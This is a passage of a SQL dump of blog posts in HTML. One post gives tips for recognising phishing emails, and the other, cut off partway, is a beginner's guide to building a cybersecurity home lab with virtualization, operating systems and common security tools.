activities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Beware of Urgent Language</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails often create a sense of panic to prompt immediate action. Urgent messages like these are a common red flag:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">“Your account has been compromised! Reset your password immediately!”</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">“Respond within 24 hours to avoid account suspension!”</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate companies rarely use dramatic or urgent language. They will also never ask for sensitive information via email.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Look for Generic Greetings</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails often lack personalization. 
Instead of addressing you by name, they might use generic terms such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">\"Dear valued member,\"</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">\"Dear customer,\"</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate emails from trusted companies typically address you by your full name.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Inspect Suspicious Links</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails often include deceptive links designed to take users to fraudulent sites that collect their data.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to Verify Links</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Hover over any link in the email to see the full URL.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Ensure the URL matches the official website of the organization. 
For example, a legitimate Google link should look like `https://accounts.google.com`, not `http://go0gle.acdf.xyz`.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Helpful Tools</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use platforms like <b><strong class=\"font-bold\">VirusTotal</strong></b> or <b><strong class=\"font-bold\">URLScan</strong></b> to analyze suspicious links for safety.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Watch for Poor Grammar and Spelling</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails may contain spelling errors, unusual phrasing, or awkward grammar since many are created quickly or by non-native speakers.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Example of Poor Grammar</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">“Your acount has been Temporary suspend, please login to reactivate it immediately.”</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate companies ensure professional communication free from grammar and spelling mistakes.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. 
Avoid Emails with Unusual Requests</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercriminals often ask for highly sensitive information, such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Social Security numbers,</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Full login credentials,</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Bank account or credit card details.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate organizations will never request sensitive information through unsolicited emails.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Recommended Tools</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use tools like <b><strong class=\"font-bold\">Have I Been Pwned</strong></b> or <b><strong class=\"font-bold\">DeHashed</strong></b> to check if your email address has been exposed in data breaches.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. 
Be Cautious with Attachments</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails may include malware-laden attachments disguised as invoices, reports, or other documents. Opening these files can compromise your device and lead to data theft.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Safe Practices</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Avoid downloading or opening attachments from unknown or unverified senders.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tools for Attachment Safety</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Platforms like <b><strong class=\"font-bold\">VirusTotal</strong></b> or <b><strong class=\"font-bold\">Hybrid Analysis</strong></b> can scan attachments to detect potential threats.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tips to Avoid Falling for Phishing Emails</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Always verify the authenticity of suspicious emails by directly contacting the sender through a verified communication method (like their official website or phone 
number).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Keep your email security settings at the highest protection levels.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly update your operating system and antivirus software to add an extra layer of malware protection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Use Two-Factor Authentication (2FA) for your online accounts for additional security.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tools to Enhance Detection of Phishing Emails</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider these tools to help fortify your defenses against phishing attempts:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hunter.io</strong></b> or <b><strong class=\"font-bold\">Maltego</strong></b> for investigating email senders.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">VirusTotal</strong></b> and <b><strong class=\"font-bold\">URLScan</strong></b> for checking suspicious links or attachments.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 
[&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Have I Been Pwned</strong></b> for monitoring email breaches.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Bottom Line</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails are one of the most common cyber threats, but knowledge and vigilance are your best defense. By staying informed and following the tips mentioned above, you can significantly reduce your chances of falling victim to phishing scams.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When in doubt, avoid interacting with suspicious emails altogether and reach out to the organization directly through a verified contact method.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Have you encountered a phishing attempt recently? Share your experiences in the comments below to help others stay protected.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:32:12', '2026-01-12 21:41:44', 'Phishing', 'How to Recognize and Avoid Phishing Emails to Stay Secure', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(133, 'Building a Home Lab for Cybersecurity Beginners', 'building-a-home-lab-for-cybersecurity-beginners', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you interested in a career in cybersecurity or simply passionate about exploring the field? A home lab is one of the best ways to develop hands-on skills and deepen your knowledge in a controlled and safe environment. Designed to simulate real-world scenarios, a home lab helps you practice both attacking and defending systems, preparing you for the challenges you\'ll encounter in the cybersecurity landscape.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will provide an in-depth look at the essential components you\'ll need to build a home lab for cybersecurity, along with tips for setting it up successfully. Buckle up—your cybersecurity adventure starts here.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Home Lab and Why Is It Important?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A home lab serves as a sandbox environment where aspiring cybersecurity professionals or enthusiasts can safely experiment, learn, and practice. It removes the risk of testing on live systems while giving you the flexibility to replicate various network setups and scenarios. Whether you\'re interested in penetration testing, ethical hacking, or network defense, a home lab is your training ground to gain practical experience.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But before you get started, you\'ll need specific tools, software, and equipment to set up your lab. 
Let\'s break them down step by step.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Virtualization Software: The Backbone of Your Lab</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Virtualization software is the foundation of any home lab. It lets you run multiple virtual machines (VMs) on a single physical computer, essentially allowing one computer to act like many. This flexibility is crucial for simulating networks and testing different configurations.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Virtualization Tools</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">VirtualBox</strong></b> (Free and open-source)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">VMware Workstation Player</strong></b> (Free for personal use; Pro version available with more features)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Hyper-V</strong></b> (Built into Windows 10 Pro and Enterprise editions)</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With virtualization software, you can install various operating systems and applications on your virtual machines, creating isolated environments for hands-on learning.</p>\r\n\r\n<h2 
class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Operating Systems to Include in Your Lab</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To maximize your learning, install a mix of operating systems to simulate diverse scenarios and vulnerabilities. Different platforms have unique security challenges, and understanding how they work is crucial in your cybersecurity training.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Must-Have Operating Systems</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Windows</strong></b> (e.g., Windows 10/11): Widely used in businesses, making it essential for practicing defending workstations and servers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Linux Distributions</strong></b>: Popular options include Ubuntu, Kali Linux (for penetration testing), and Fedora. 
Kali Linux, in particular, is a staple for those interested in ethical hacking.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">macOS</strong></b> (if available): Though less commonly targeted, it\'s valuable for testing compatibility and gaining insights into its security ecosystem.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Having this variety of operating systems ensures you\'re well-versed in handling threats across multiple platforms.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Essential Tools and Software for Cybersecurity Practice</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The tools you use in your home lab will play a significant role in developing your skills. 
Here’s a breakdown of some key categories and recommended software/tools for each.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Penetration Testing Tools</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Practicing penetration testing helps sharpen your ability to identify and exploit vulnerabilities—skills highly sought after in the industry.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Metasploit Framework</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Nmap</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Aircrack-ng</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">John the Ripper</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerability Scanners</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Vulnerability scanners locate and assess weaknesses within a system or network.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Nessus</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">OpenVAS</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">QualysGuard</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Security Information and Event Management (SIEM) Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">SIEM tools monitor, analyze, and log security events, making them invaluable for learning network defense strategies.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Splunk</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Elastic Stack (formerly ELK Stack)</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Graylog</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Firewalls</h3>\r\n<p class=\"text-body font-regular 
leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Firewalls form the basis of network security. Explore configuring and managing these in your lab.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">pfSense</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Untangle</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Sophos UTM</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A combination of these tools will give you the breadth and depth of skills you need.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Networking Equipment for Real-World Simulations</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To create a realistic network environment, you\'ll need the right networking equipment. 
While virtualization can simulate many networking features, physical equipment offers additional learning opportunities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Networking Hardware</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Routers</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Switches</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Network Adapters</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Firewalls</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This equipment allows you to practice configuring complex network setups, monitoring traffic, and testing attack scenarios in a simulated environment.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Importance of Sufficient Storage Space</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Working with virtualization and large data sets often requires significant storage space. 
A fast and reliable <b><strong class=\"font-bold\">solid-state drive (SSD)</strong></b> is recommended to store your virtual machines and operating systems, ensuring quick performance and minimal downtime.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider an SSD with at least <b><strong class=\"font-bold\">500GB or more</strong></b> to accommodate your growing lab. Additionally, external drives can help expand your storage capacity when needed.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps to Build and Maximize Your Home Lab</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now that you know what you need, here’s how to put it all together:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular 